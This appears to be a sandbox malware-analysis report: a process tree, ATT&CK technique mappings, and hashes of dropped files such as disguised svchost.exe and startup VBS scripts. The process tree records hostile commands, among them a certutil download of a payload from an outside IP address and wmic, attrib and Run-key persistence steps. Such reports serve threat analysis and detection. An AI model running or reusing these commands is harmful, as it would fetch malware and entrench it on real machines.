        
        certutil -urlcache -split -f "http://52.77.214.77:8083/xm/64a1.com" "C:\Users\Admin\AppData\Local\Temp\updateW\64a1.com"
        7⤵
        
        PID:2504
        
        C:\Users\Admin\AppData\Local\Temp\updateW\64a1.com
        
        "C:\Users\Admin\AppData\Local\Temp\updateW\64a1.com"
        7⤵
        
        PID:2292
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Windows (x86)\aarun.vbs"
        8⤵
        
        PID:2460
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Windows (x86)\xagal.bat" "
        9⤵
        
        PID:864
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic process where ExecutablePath='C:\\Windows (x86)\\explorer.exe' delete
        10⤵
        
        PID:272
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib -s -h "C:\Windows (x86)\*.*"
        10⤵
        Views/modifies file attributes
        
        PID:1008
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic csproduct get UUID /format:list |find "="
        10⤵
        
        PID:960
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic csproduct get UUID /format:list
        11⤵
        
        PID:272
        
        C:\Windows\SysWOW64\find.exe
        
        find "="
        11⤵
        
        PID:1008
        
        C:\Windows (x86)\explorer.exe
        
        "C:\Windows (x86)\explorer.exe"
        10⤵
        
        PID:2688
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c del "C:\Windows (x86)\xagal.bat"
        10⤵
        
        PID:2460
        
        C:\Users\Admin\AppData\Local\Temp\updateW\win.com
        
        "C:\Users\Admin\AppData\Local\Temp\updateW\win.com"
        7⤵
        
        PID:1896
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 5
        7⤵
        Runs ping.exe
        
        PID:2748
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where ExecutablePath='C:\\Windows (x86)\\explorer.exe' delete
        7⤵
        
        PID:1252
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where ExecutablePath='C:\\Windows (x86)\\PolicyDefinitions\\en-US\\regedit.exe' delete
        7⤵
        
        PID:2460
        
        C:\Windows\system32\attrib.exe
        
        attrib -s -h "C:\Windows (x86)\*.*"
        7⤵
        Views/modifies file attributes
        
        PID:1812
        
        C:\Windows (x86)\explorer.exe
        
        "C:\Windows (x86)\explorer.exe"
        7⤵
        
        PID:864
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\t.vbs"
  2⤵
  - Drops startup file
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:1988
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\t.vbs"
    3⤵
    - Blocklisted process makes network request
    - Drops startup file
    - Adds Run key to start application
    PID:780
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\z.vbs"
  2⤵
  - Drops startup file
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:1716
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\z.vbs"
    3⤵
    - Blocklisted process makes network request
    - Drops startup file
    - Adds Run key to start application
    PID:1668

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Hidden Files and Directories

T1158

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Hidden Files and Directories

T1158

Modify Registry

T1112

Web Service

T1102

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\5AC.tmp\5BD.bat

Filesize
13KB

MD5
b8d37d42c7b70fb63c19f741c3a23d63

SHA1
62c43ac9efa8f3abb6a3a1f529076ef5d3ae37d9

SHA256
6822b2a4a79cf09c86263d7464abc7ccf375dd37ba5ff5503f3c4f1c9fad8188

SHA512
800bc7db00e77a6f563a9f036c45b3a91eb07831080903da043c00cd5d76cd0528a79458365f4077020830515a3b23689e751e9bed940738c3221a93f491d19e

Download Submit
C:\Users\Admin\AppData\Local\Temp\VERIU.BAT

Filesize
132B

MD5
cc9ff4010b7de68a7328981e59618920

SHA1
d709369490a2544d620ba0df857dadd0bb0d791c

SHA256
b833c8c8433ea9967887502359228be622959ff2e5cf7286112d7a15b7b7eb24

SHA512
e6053527ee46b281a43571519d46cf20f7909bf9f71097fda3489fdfd501f9928f3e3e4394673d91f3260d6fb4d906eb226fc7f87d5e279deb6af5ee140ae573

Download Submit
C:\Users\Admin\AppData\Local\Temp\t.vbs

Filesize
15KB

MD5
f1f6c2f5f157315eacc6fa592fde70c9

SHA1
dcdcf3850e7c9b01fd353b06b3fbfaef7737601b

SHA256
74743029cfecb65d3eaa59c287ab85376d17fc6e0dc3e6a6a7ad04bb448e3523

SHA512
08861ff095da4a47649a90edb5700a989fd5603ea56e60db319295928a3351d5b97bed06ee4a184a18e8ea3642dc18a2dfd0f371292f87ce4c91fffdf20b5b4f

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpF9EB.tmp.exe

Filesize
772KB

MD5
7ed5b2dec02ef2ddc967fa9ca0dd8d2f

SHA1
0f471be520c5c78a0a40a4026237e04c366a3110

SHA256
c787c9a5f407a656478efc835f1a0f8f738030bf26cedbd4748cb7b18ed2ea3e

SHA512
9e8df81da00ccd9345bf3dfa2f01906830ca718875c0e535498eed6a73db62a1ec3149ea611d1f60c1c144a86d6f94482b985a9e7dbdd23b5d8f1b43e347f09e

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpF9EB.tmp.exe

Filesize
772KB

MD5
7ed5b2dec02ef2ddc967fa9ca0dd8d2f

SHA1
0f471be520c5c78a0a40a4026237e04c366a3110

SHA256
c787c9a5f407a656478efc835f1a0f8f738030bf26cedbd4748cb7b18ed2ea3e

SHA512
9e8df81da00ccd9345bf3dfa2f01906830ca718875c0e535498eed6a73db62a1ec3149ea611d1f60c1c144a86d6f94482b985a9e7dbdd23b5d8f1b43e347f09e

Download Submit
C:\Users\Admin\AppData\Local\Temp\updateW\64a1.com

Filesize
2.1MB

MD5
ed2c8bb4eff7a646b544da1dfae70e05

SHA1
f51e52aa2ae2cc74997b567bf9ce84d9eb351a79

SHA256
498bb94d257bbbf5a1b039c8168f5ce86e9b7fabc089cb6509b726ed5b557563

SHA512
86c3552aa223d8fd06c87d0075021e4a83e8e77199ad1e6538ce6052cb8e9ceaffbe074515c92c2842da25d478c33164f7a73d5015932f407f1c104749dcef71

Download Submit
C:\Users\Admin\AppData\Local\Temp\updateW\64a1.com

Filesize
2.1MB

MD5
ed2c8bb4eff7a646b544da1dfae70e05

SHA1
f51e52aa2ae2cc74997b567bf9ce84d9eb351a79

SHA256
498bb94d257bbbf5a1b039c8168f5ce86e9b7fabc089cb6509b726ed5b557563

SHA512
86c3552aa223d8fd06c87d0075021e4a83e8e77199ad1e6538ce6052cb8e9ceaffbe074515c92c2842da25d478c33164f7a73d5015932f407f1c104749dcef71

Download Submit
C:\Users\Admin\AppData\Local\Temp\updateW\Microsoft.exe

Filesize
63KB

MD5
a5b1e5ca923df2568e09456390ff0ad8

SHA1
03b39ecd7d246a521fafd210d6be548fd1d337fd

SHA256
2246f52abfa3e125b7eb5831b40130fb1d4b6b2a274fef9b3b7aa854487b70a3

SHA512
7c286de35fd8899a2a43791e8a50436362a12f78b2582dcb72c75470a7ea50e3788d8ce4846de825501e929cf9a2e4ece4cd5d75f2627cd6ccf78cd91c2a885c

Download Submit
C:\Users\Admin\AppData\Local\Temp\updateW\irom.com

Filesize
323KB

MD5
c28f5884742601af68f6254e1b1372b9

SHA1
ab7472a2f56fca9f7f6e7519dea98eb06538e1ae

SHA256
1fbecefc4ef848e7c9ebd924c6fc11ffefdb0fa3bc87198b5062df09ab2faa1a

SHA512
e2ea63226b2cdc4273c46591b600775503c2d927f6b7892a7f983692e0568eb500c5c278c17129c72a7c6195f63116c11428e5537d04b6878f1398906bdf33d5

Download Submit
C:\Users\Admin\AppData\Local\Temp\updateW\irom.com

Filesize
323KB

MD5
c28f5884742601af68f6254e1b1372b9

SHA1
ab7472a2f56fca9f7f6e7519dea98eb06538e1ae

SHA256
1fbecefc4ef848e7c9ebd924c6fc11ffefdb0fa3bc87198b5062df09ab2faa1a

SHA512
e2ea63226b2cdc4273c46591b600775503c2d927f6b7892a7f983692e0568eb500c5c278c17129c72a7c6195f63116c11428e5537d04b6878f1398906bdf33d5

Download Submit
C:\Users\Admin\AppData\Local\Temp\updateW\lirb.com

Filesize
327KB

MD5
96314747c1f52485836c7eda570aa6e2

SHA1
98690473cd1e3740debc66322e1586fce1b228b0

SHA256
601bc48b0e84678055ae18a99d4e70f58373c436bd8b3c6669d4ba53a01d0ffc

SHA512
eb636c9537f3d13f2fc54565334655262d15a063c220eae1b2dceed093e7f8da282bd206d9dba5243be0cf51886db948c91d5529148c0041d94c30a934ae5389

Download Submit
C:\Users\Admin\AppData\Local\Temp\updateW\lirb.com

Filesize
327KB

MD5
96314747c1f52485836c7eda570aa6e2

SHA1
98690473cd1e3740debc66322e1586fce1b228b0

SHA256
601bc48b0e84678055ae18a99d4e70f58373c436bd8b3c6669d4ba53a01d0ffc

SHA512
eb636c9537f3d13f2fc54565334655262d15a063c220eae1b2dceed093e7f8da282bd206d9dba5243be0cf51886db948c91d5529148c0041d94c30a934ae5389

Download Submit
C:\Users\Admin\AppData\Local\Temp\updateW\win.com

Filesize
2.0MB

MD5
93f47f76917294e7c1fc11ba690f12d7

SHA1
9895db1213530dac6b90ce61fdcd24020dea83a8

SHA256
a0b16cc5fe93ac5c9c05d0de92cbfa97aaaceefbac036058677f60ee988804a6

SHA512
6e87151dc48a9e9ac21fec5f486a74dac8f695bdc95fe00c801e999f523800b0045c0dd219ba5e5ce75f768e654c35dcc5eae56898b4d8a3738941a69b797199

Download Submit
C:\Users\Admin\AppData\Local\Temp\updateW\win.com

Filesize
2.0MB

MD5
93f47f76917294e7c1fc11ba690f12d7

SHA1
9895db1213530dac6b90ce61fdcd24020dea83a8

SHA256
a0b16cc5fe93ac5c9c05d0de92cbfa97aaaceefbac036058677f60ee988804a6

SHA512
6e87151dc48a9e9ac21fec5f486a74dac8f695bdc95fe00c801e999f523800b0045c0dd219ba5e5ce75f768e654c35dcc5eae56898b4d8a3738941a69b797199

Download Submit
C:\Users\Admin\AppData\Local\Temp\updateW\windowsapp.exe

Filesize
37KB

MD5
379528dce8b0f2cc61ff99a3df2a9928

SHA1
58f6e48e29cea7de9abd7ae5b7c99abdaa2412e2

SHA256
874fa85adde3cc5b3cd0d7d932e28a0ec2a53d3b5566c8160772bde6d092c141

SHA512
b7a0b90ed1163cb1bbd63ae2e4c6ea576d81286b307b3c11beb20ab1f8427a4da81b05a9c8da9b7af067d74f9af973549bc601bb07161538404425af4dffe940

Download Submit
C:\Users\Admin\AppData\Local\Temp\updateW\winupdate.exe

Filesize
47KB

MD5
eb9e4955edda276425933aea122f9a84

SHA1
6763106ffdc12cf213f579f72c1c6e8f3272fa9c

SHA256
75180613894eb3345319cc207d66688e5219035a05e97d330a2397d51cc397c6

SHA512
621cb956531c7e70715cb14eb3b5ff030fa1b3387a97b7ef04a847bdb54878ad713162115c78ce46dca3d3f11b5742a23e8a1fecd34e30429e934c487aafa60f

Download Submit
C:\Users\Admin\AppData\Local\Temp\z.vbs

Filesize
47KB

MD5
411c29da4ca50b15ae8432d23089ea6f

SHA1
b8cee3ce1398129e4967e3098722ebb49576b5d7

SHA256
8698a17d6a6c296fb7ce932cb86b9db610bd3056cf4183a273506829d71f86b2

SHA512
7ba5dde15bb497fab59e2b993d7e9a2da84359f9af97297628d7163a4cd3e3a49d08136ad43f3af7dbacaeba6d874c76e09a7b6a0aad15f03caa70fc31972949

Download Submit
C:\Users\Admin\AppData\Roaming\AppData\Flash Player\backup.vbs

Filesize
46KB

MD5
303b4e8b3434cc3377f3e2b6fb8d157a

SHA1
4fb5a2a44df5d4bf01693881040dc5117eadedab

SHA256
f8e9d58f0eb6b1d398dc4532966ff7686956111f465a0777effc9b435ff0b4c5

SHA512
8e9c9c61f03dc3d62026923a75626bf70390453b2d58c43e22fab6a240676ab0cd7bd6268407256bb974baac20786e9529d01388d8faebbb520a26ec6f586e21

Download Submit
C:\Users\Admin\AppData\Roaming\AppData\Flash Player\main.vbs

Filesize
43KB

MD5
dc64f4006ac8da132aac23cee3e22332

SHA1
f7ff2b567c1f5d76937d6cf6b6b45dcbeac3b393

SHA256
7b8b5acc0e36cde3a00177395f234b588b96ecb89e3c317d7e703c995463050f

SHA512
538c04d3b80a9beefc1f3b666ba705d34a85f8e52c91c4f3abf44a1d0101cbde0a4645c21bda4c02ef6a0d0355f0f1c38469a3600280c6bdfb614fb8365c3552

Download Submit
C:\Users\Admin\AppData\Roaming\AppData\Windows Protector\winlogon.exe

Filesize
30KB

MD5
81b88e00b20c4fc25b4cc37c76183d25

SHA1
e49c1133657c6a37699e4a88702169218f0cb209

SHA256
267f30410791f5bb1b942a33daa6a66337758283c2f0710331be9430a380fd63

SHA512
055400816e0a29f45c80a6f5f5183a49985d9a9718e921967de85870f04e851372e96a51d630e47052c5046d5e17841eecba4e560ed72eeefb0ec75c09074e24

Download Submit
C:\Users\Admin\AppData\Roaming\AppData\Windows Protector\winlogon.exe

Filesize
30KB

MD5
81b88e00b20c4fc25b4cc37c76183d25

SHA1
e49c1133657c6a37699e4a88702169218f0cb209

SHA256
267f30410791f5bb1b942a33daa6a66337758283c2f0710331be9430a380fd63

SHA512
055400816e0a29f45c80a6f5f5183a49985d9a9718e921967de85870f04e851372e96a51d630e47052c5046d5e17841eecba4e560ed72eeefb0ec75c09074e24

Download Submit
C:\Users\Admin\AppData\Roaming\AppData\Windows Updates\winupdate.exe

Filesize
47KB

MD5
eb9e4955edda276425933aea122f9a84

SHA1
6763106ffdc12cf213f579f72c1c6e8f3272fa9c

SHA256
75180613894eb3345319cc207d66688e5219035a05e97d330a2397d51cc397c6

SHA512
621cb956531c7e70715cb14eb3b5ff030fa1b3387a97b7ef04a847bdb54878ad713162115c78ce46dca3d3f11b5742a23e8a1fecd34e30429e934c487aafa60f

Download Submit
C:\Users\Admin\AppData\Roaming\MicrosoftData\svchost.exe

Filesize
28KB

MD5
10d4fb7e4295a4a518aa9355db980e5d

SHA1
1974f67c6fc402b1aa805b5bdf628b045349016b

SHA256
e716064b119002efcbe4389cf49eb737be4ff37a515ab87dedb7ab834c975cf5

SHA512
ee5106defd6b63b38ce10869c227c16fc07fe19bdd4a5255dff50155b6ab2d2861fb363b536c276fae597d796c87ed47b4834ecce60277c6c73b02b00c9e3d1c

Download Submit
C:\Users\Admin\AppData\Roaming\MicrosoftData\svchost.exe

Filesize
28KB

MD5
10d4fb7e4295a4a518aa9355db980e5d

SHA1
1974f67c6fc402b1aa805b5bdf628b045349016b

SHA256
e716064b119002efcbe4389cf49eb737be4ff37a515ab87dedb7ab834c975cf5

SHA512
ee5106defd6b63b38ce10869c227c16fc07fe19bdd4a5255dff50155b6ab2d2861fb363b536c276fae597d796c87ed47b4834ecce60277c6c73b02b00c9e3d1c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\backup.vbs

Filesize
46KB

MD5
303b4e8b3434cc3377f3e2b6fb8d157a

SHA1
4fb5a2a44df5d4bf01693881040dc5117eadedab

SHA256
f8e9d58f0eb6b1d398dc4532966ff7686956111f465a0777effc9b435ff0b4c5

SHA512
8e9c9c61f03dc3d62026923a75626bf70390453b2d58c43e22fab6a240676ab0cd7bd6268407256bb974baac20786e9529d01388d8faebbb520a26ec6f586e21

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\main.vbs

Filesize
43KB

MD5
dc64f4006ac8da132aac23cee3e22332

SHA1
f7ff2b567c1f5d76937d6cf6b6b45dcbeac3b393

SHA256
7b8b5acc0e36cde3a00177395f234b588b96ecb89e3c317d7e703c995463050f

SHA512
538c04d3b80a9beefc1f3b666ba705d34a85f8e52c91c4f3abf44a1d0101cbde0a4645c21bda4c02ef6a0d0355f0f1c38469a3600280c6bdfb614fb8365c3552

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t.vbs

Filesize
15KB

MD5
f1f6c2f5f157315eacc6fa592fde70c9

SHA1
dcdcf3850e7c9b01fd353b06b3fbfaef7737601b

SHA256
74743029cfecb65d3eaa59c287ab85376d17fc6e0dc3e6a6a7ad04bb448e3523

SHA512
08861ff095da4a47649a90edb5700a989fd5603ea56e60db319295928a3351d5b97bed06ee4a184a18e8ea3642dc18a2dfd0f371292f87ce4c91fffdf20b5b4f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t.vbs

Filesize
15KB

MD5
f1f6c2f5f157315eacc6fa592fde70c9

SHA1
dcdcf3850e7c9b01fd353b06b3fbfaef7737601b

SHA256
74743029cfecb65d3eaa59c287ab85376d17fc6e0dc3e6a6a7ad04bb448e3523

SHA512
08861ff095da4a47649a90edb5700a989fd5603ea56e60db319295928a3351d5b97bed06ee4a184a18e8ea3642dc18a2dfd0f371292f87ce4c91fffdf20b5b4f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\z.vbs

Filesize
47KB

MD5
411c29da4ca50b15ae8432d23089ea6f

SHA1
b8cee3ce1398129e4967e3098722ebb49576b5d7

SHA256
8698a17d6a6c296fb7ce932cb86b9db610bd3056cf4183a273506829d71f86b2

SHA512
7ba5dde15bb497fab59e2b993d7e9a2da84359f9af97297628d7163a4cd3e3a49d08136ad43f3af7dbacaeba6d874c76e09a7b6a0aad15f03caa70fc31972949

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\z.vbs

Filesize
47KB

MD5
411c29da4ca50b15ae8432d23089ea6f

SHA1
b8cee3ce1398129e4967e3098722ebb49576b5d7

SHA256
8698a17d6a6c296fb7ce932cb86b9db610bd3056cf4183a273506829d71f86b2

SHA512
7ba5dde15bb497fab59e2b993d7e9a2da84359f9af97297628d7163a4cd3e3a49d08136ad43f3af7dbacaeba6d874c76e09a7b6a0aad15f03caa70fc31972949

Download Submit
C:\Users\Admin\AppData\Roaming\svchost.exe

Filesize
28KB

MD5
10d4fb7e4295a4a518aa9355db980e5d

SHA1
1974f67c6fc402b1aa805b5bdf628b045349016b

SHA256
e716064b119002efcbe4389cf49eb737be4ff37a515ab87dedb7ab834c975cf5

SHA512
ee5106defd6b63b38ce10869c227c16fc07fe19bdd4a5255dff50155b6ab2d2861fb363b536c276fae597d796c87ed47b4834ecce60277c6c73b02b00c9e3d1c

Download Submit
C:\Users\Admin\AppData\Roaming\svchost.exe

Filesize
28KB

MD5
10d4fb7e4295a4a518aa9355db980e5d

SHA1
1974f67c6fc402b1aa805b5bdf628b045349016b

SHA256
e716064b119002efcbe4389cf49eb737be4ff37a515ab87dedb7ab834c975cf5

SHA512
ee5106defd6b63b38ce10869c227c16fc07fe19bdd4a5255dff50155b6ab2d2861fb363b536c276fae597d796c87ed47b4834ecce60277c6c73b02b00c9e3d1c

Download Submit
C:\Users\Admin\AppData\Roaming\t.vbs

Filesize
15KB

MD5
f1f6c2f5f157315eacc6fa592fde70c9

SHA1
dcdcf3850e7c9b01fd353b06b3fbfaef7737601b

SHA256
74743029cfecb65d3eaa59c287ab85376d17fc6e0dc3e6a6a7ad04bb448e3523

SHA512
08861ff095da4a47649a90edb5700a989fd5603ea56e60db319295928a3351d5b97bed06ee4a184a18e8ea3642dc18a2dfd0f371292f87ce4c91fffdf20b5b4f

Download Submit
C:\Users\Admin\AppData\Roaming\z.vbs

Filesize
47KB

MD5
411c29da4ca50b15ae8432d23089ea6f

SHA1
b8cee3ce1398129e4967e3098722ebb49576b5d7

SHA256
8698a17d6a6c296fb7ce932cb86b9db610bd3056cf4183a273506829d71f86b2

SHA512
7ba5dde15bb497fab59e2b993d7e9a2da84359f9af97297628d7163a4cd3e3a49d08136ad43f3af7dbacaeba6d874c76e09a7b6a0aad15f03caa70fc31972949

Download Submit
C:\Windows (x86)\1xs.txt

Filesize
1KB

MD5
4bef77593548c8ffbe1032d1e19fdbe1

SHA1
396ed9957651cd175dfe1a07274fcf97b8498c7b

SHA256
19c089eef95773db053e4296baa918ed3a4e98fed7ec96ea5dd796bf95b5f4c6

SHA512
661769875578c3e498b526f0541b6ab4f52d87b49e0b0688ac65b3c44f2bdf929bf810c0187c8cc39ab9a004d3e985dc0120f12c07e8cd646beedba93ea93546

Download Submit
C:\Windows (x86)\3xs.txt

Filesize
938B

MD5
d80386f87dd89d45b52e57309bb3d967

SHA1
4b5df6a75c30a66d153b021518383d9e78d85c96

SHA256
0cb8999b0ac329d2f18a50a25344c8075f7e2eb472292f04bc099afef90166aa

SHA512
7fe22bc10555f6db611248418d04d47805970f04bddc05f6e40ab98a02b6f238292cf746ca1b48f575d5c511e5adaece68110d167bccc91aadda41772fe80096

Download Submit
C:\Windows (x86)\AppxProvisioning.xml

Filesize
2KB

MD5
85acfc76e1be21cd8602f85d1cf845ba

SHA1
f5507f6cf6e9b03ca06a69fffafede91d2799ef0

SHA256
29b4fc2e6b4814d13cea16ed9114e6cb764a1e92dbc1ed49ef834168b1e9cfb4

SHA512
e6c8b19d798c04ebfac501ed55bd5218f59e3780501ec200196f81d6f3d8069d1a43f3629932683c531dd3977b44e1a5e3f7c8e793b92c0797d4810150b4d068

Download Submit
C:\Windows (x86)\BluetoothPairingSystemToastIcon.contrast-black.png

Filesize
8KB

MD5
705628497c0012302212a46add463e6e

SHA1
c1b0e1ed262832698d695d6893408f271a3832f1

SHA256
a7a5c03e5ec4348e30060935d9041b4b58f34de2376da9155258684ed52a4865

SHA512
0a26cca53a35706eb8cd39fac7671e28b38dc3709968d3fc571ea37b2b9cff238c964567c3c7f769305dad410a5ff042ae30b76bfb8ebe96633993fbbbdf5ea2

Download Submit
C:\Windows (x86)\BluetoothPairingSystemToastIcon.contrast-high.png

Filesize
8KB

MD5
f63c615733a3337bf2bea96c6ee9b568

SHA1
9c6122515da1d630ca04a303c4c296be6a696e14

SHA256
b0fda245579e57a9c613e1288c6b294c907a3b8e5bee32a72437a4fbfabc061c

SHA512
76c024e3a2bee36d308db5a71e5cd30410b25cdb55412d9ffe68f6c2ed83a6553ee9dca53e8996631b42b48b3ffd12470658e9645ec6a2270711cbb15561f897

Download Submit
C:\Windows (x86)\BluetoothPairingSystemToastIcon.contrast-white.png

Filesize
8KB

MD5
705628497c0012302212a46add463e6e

SHA1
c1b0e1ed262832698d695d6893408f271a3832f1

SHA256
a7a5c03e5ec4348e30060935d9041b4b58f34de2376da9155258684ed52a4865

SHA512
0a26cca53a35706eb8cd39fac7671e28b38dc3709968d3fc571ea37b2b9cff238c964567c3c7f769305dad410a5ff042ae30b76bfb8ebe96633993fbbbdf5ea2

Download Submit
C:\Windows (x86)\BluetoothPairingSystemToastIcon.png

Filesize
8KB

MD5
daf1dcb4aee839a1965f4cc160c49a53

SHA1
5830048cd318d13c2841998082c97fb579040904

SHA256
91d33ec5f008f2066b3a6658e1915b09a4fea2ed70e5260a0bd37c618c219fc1

SHA512
9b2af035dcf877eaca4ea5da053417fd8840d79abcff53e607bbd48f21cda85ae004f94325da44266653d23a255e85675100a41521b840c7bf282dde48bbd23e

Download Submit
C:\Windows (x86)\DMAppsRes.dll

Filesize
2KB

MD5
373e36f2470ad6dd714bee7ce7406c03

SHA1
6f99d517470ad94c709b43d11a7182b4e28b0c47

SHA256
04ba799641106d47e995283c3b1d1196b1837025fafadafe4b983ecb98a089af

SHA512
82b0802423a1486c6dd77714ae468fe8327de39c6402c1927dddfca632ab7d27e2f65714fa25780cd51b528deaa38bf956b778a1b9e0e3adeab622a29c0ec725

Download Submit
C:\Windows (x86)\DetailedReading-Default.xml

Filesize
3KB

MD5
4a6fa3c0efd237f104e09a22883d9388

SHA1
4fb30a39a11ef1115159b8585efeab4fc9ddaa91

SHA256
a75bcfa83c8e80720624646486daec8c1835fef2fef868b93e02a4c489287c7c

SHA512
489a0b94a34aa7068741a77c7f78319d582ed7ad15b077727b3c1af501056d67f12ba47007f78f07868690b83d10815ed5c83f641dc8c87ad99cb2fa1794df6d

Download Submit
C:\Windows (x86)\aarun.vbs

Filesize
115B

MD5
29a3502c721319b896b4cf7aae0aaec5

SHA1
de94cfb0214c0deddfbea191598bac33dce53bb9

SHA256
a84a10c5ca727e766a5c25cf6f6f42b3dc3fd8760a5c8a755b77e1404c84b7a0

SHA512
7e791091dac79af2feb151e077ed5e991faec214ff6f857afbf882e2664fc26f044e49b218b422459e7319b1d899ad397be5b8ab9f0d036765a48cf461560cc8

Download Submit
C:\Windows (x86)\advapi32res.dll

Filesize
2KB

MD5
1ba129902c8b7bed03c7cdc7867c736f

SHA1
f2e5105d7a458aabeeb89df8c3bec343473bde99

SHA256
0e038b89882758458f234481adae1a67fb18c3255d963b1d9c969d0d395b44cb

SHA512
d712189b1a2a54117ef062215a4db0edd306cf049f62666837fd527442060141c9d729bb5f616f1f43f5807bcdb6e5d4e946a4ad4a73c3d9dbb767013f12bd3d

Download Submit
C:\Windows (x86)\asferror.dll

Filesize
2KB

MD5
7adeccbc25fc6c44822d1a3ca03d3bd9

SHA1
97d42ff16c83a0802fdfe35d4c2342ba31c532c7

SHA256
03475a7d63f2f2a09d74b6406890d40eb64432dcdc032d55b34f15abb5ca47d3

SHA512
e1442c1fe9f3ceaedaca3f889ac20aa83e40147c3cb62314871f9e90de484949531fd53920093ab7451d28a01ce5d45c612b5a5b075ef7592803da798073f6d9

Download Submit
C:\Windows (x86)\blbres.dll

Filesize
2KB

MD5
e51330dff5b6d09076abcae74bdab37b

SHA1
9827b8ec15c7aa06341763a388ab11479412fc36

SHA256
d386c4ad3223859578018d8012775021e315d2708f3d220106171d6836e6f4ad

SHA512
3eb9813c45f4fa0bda9a1bdf07456e9624679b101a0fcb47d5d37c23ffaf5f93afee2fa513f40c4aaedb7962811520e1b6fc0b994117378cb39d33480d909e68

Download Submit
C:\Windows (x86)\bootstr.dll

Filesize
3KB

MD5
5c92bc8ae13ec449ca223e229bc86fdc

SHA1
2dbe40b89946f369634666fd105f94d2eea90d2c

SHA256
69c7f82badbd72ac5460bbc8f3f33aefb705e45591fc51a47a8264b616c8dd0b

SHA512
200a715824f77c642d7318c87ed9a5d80ccf802cf02556ab4e6c908e24b31de966e7d3ab57ab0a8c8a2043007252cee3a3a9851a3964da6b994ffcfc7008a788

Download Submit
C:\Windows (x86)\bridgeres.dll

Filesize
2KB

MD5
557ec7fe5ddb6b0e2b88ec4706cb394a

SHA1
4288db3c285c6abe08011c9ec5c432795753e43b

SHA256
12f1cbbae3f347c9ac1fd9229eab1658f86f5fd3f3e8438c46b69cd0c68feee1

SHA512
ea7936e56f6de188d8b35ed4cfedbae34d4e6cb5161eadb5234bbb4bae6c3bc946b111f9cef595c3e73e1f18b1e89c5a598407426766f3d3c30c9b3106be398e

Download Submit
C:\Windows (x86)\defragres.dll

Filesize
4KB

MD5
a8e3e8608e47101445aee826fee3f611

SHA1
197258ae69a536dc0f015779bde233a3e4d49859

SHA256
8c5af3b03fcc11bf17ded481bddbdfc0811077c7391b0d4ba616cc2ead47e80c

SHA512
fbcfce2b040762de747da96460d6c648616054a8a004cb385cbf179981321339b254fa282fab171925f63ab4f9ef86724c595635db13b22521bfcbef8f9cc555

Download Submit
C:\Windows (x86)\dmdskres2.dll

Filesize
2KB

MD5
00adb63b901732cb6ebcdb3b9d404945

SHA1
946088b565459987b96427e590fceb078a3a9688

SHA256
e8a7eee20b9de1d981334011ac5550c44fb98a189a4ea24a6660c3efb314b51d

SHA512
ada58be64f7cab2fcca27e753ca9b5f4fd2eec3e6ab705bc66ad33d009819a0e5fd5bda7ccb34151cf23a023c0dd89ce4b3bfb0696ab8135c9fd9002274717a2

Download Submit
C:\Windows (x86)\xagal.bat

Filesize
759B

MD5
104470f3c1211668407c2519f44862f9

SHA1
58054e1f3ef8e70210fe362dd491a65231494fcb

SHA256
cd2c3436284a9e2e6505a01d73edad527e3094a7c7efc7890d476638924ed2bf

SHA512
aa1575f35d252f0a0c19599d87cd44483c3468873cd9f141e22214f22d9b321d227d9a3b027b923ea2a931896f5f7811eabf8f7ff2e7a9d869010049888848d7

Download Submit
\Users\Admin\AppData\Local\Temp\tmpF9EB.tmp.exe

Filesize
772KB

MD5
7ed5b2dec02ef2ddc967fa9ca0dd8d2f

SHA1
0f471be520c5c78a0a40a4026237e04c366a3110

SHA256
c787c9a5f407a656478efc835f1a0f8f738030bf26cedbd4748cb7b18ed2ea3e

SHA512
9e8df81da00ccd9345bf3dfa2f01906830ca718875c0e535498eed6a73db62a1ec3149ea611d1f60c1c144a86d6f94482b985a9e7dbdd23b5d8f1b43e347f09e

Download Submit
\Users\Admin\AppData\Local\Temp\updateW\windowsapp.exe

Filesize
37KB

MD5
379528dce8b0f2cc61ff99a3df2a9928

SHA1
58f6e48e29cea7de9abd7ae5b7c99abdaa2412e2

SHA256
874fa85adde3cc5b3cd0d7d932e28a0ec2a53d3b5566c8160772bde6d092c141

SHA512
b7a0b90ed1163cb1bbd63ae2e4c6ea576d81286b307b3c11beb20ab1f8427a4da81b05a9c8da9b7af067d74f9af973549bc601bb07161538404425af4dffe940

Download Submit
